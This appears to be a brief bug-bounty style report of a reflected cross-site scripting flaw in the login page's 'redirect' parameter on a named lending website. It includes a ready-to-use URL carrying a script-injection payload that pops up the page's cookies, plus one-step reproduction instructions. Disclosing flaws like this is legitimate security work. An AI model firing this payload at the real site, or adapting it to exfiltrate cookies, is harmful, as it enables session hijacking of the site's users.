Vulnerability Name : Cross Site Scripting
Vulnerable URL : https://kissht.com/login?redirect=digi%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Vulnerable Parameter : redirect
Vulnerable Payload : digi"/><script>alert(document.cookie)</script>
How to reproduce this issue:
1. Visit the url it will give an XSS popup.
https://kissht.com/login?redirect=digi%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
POC :
Screenshort can be found in the attachment.
656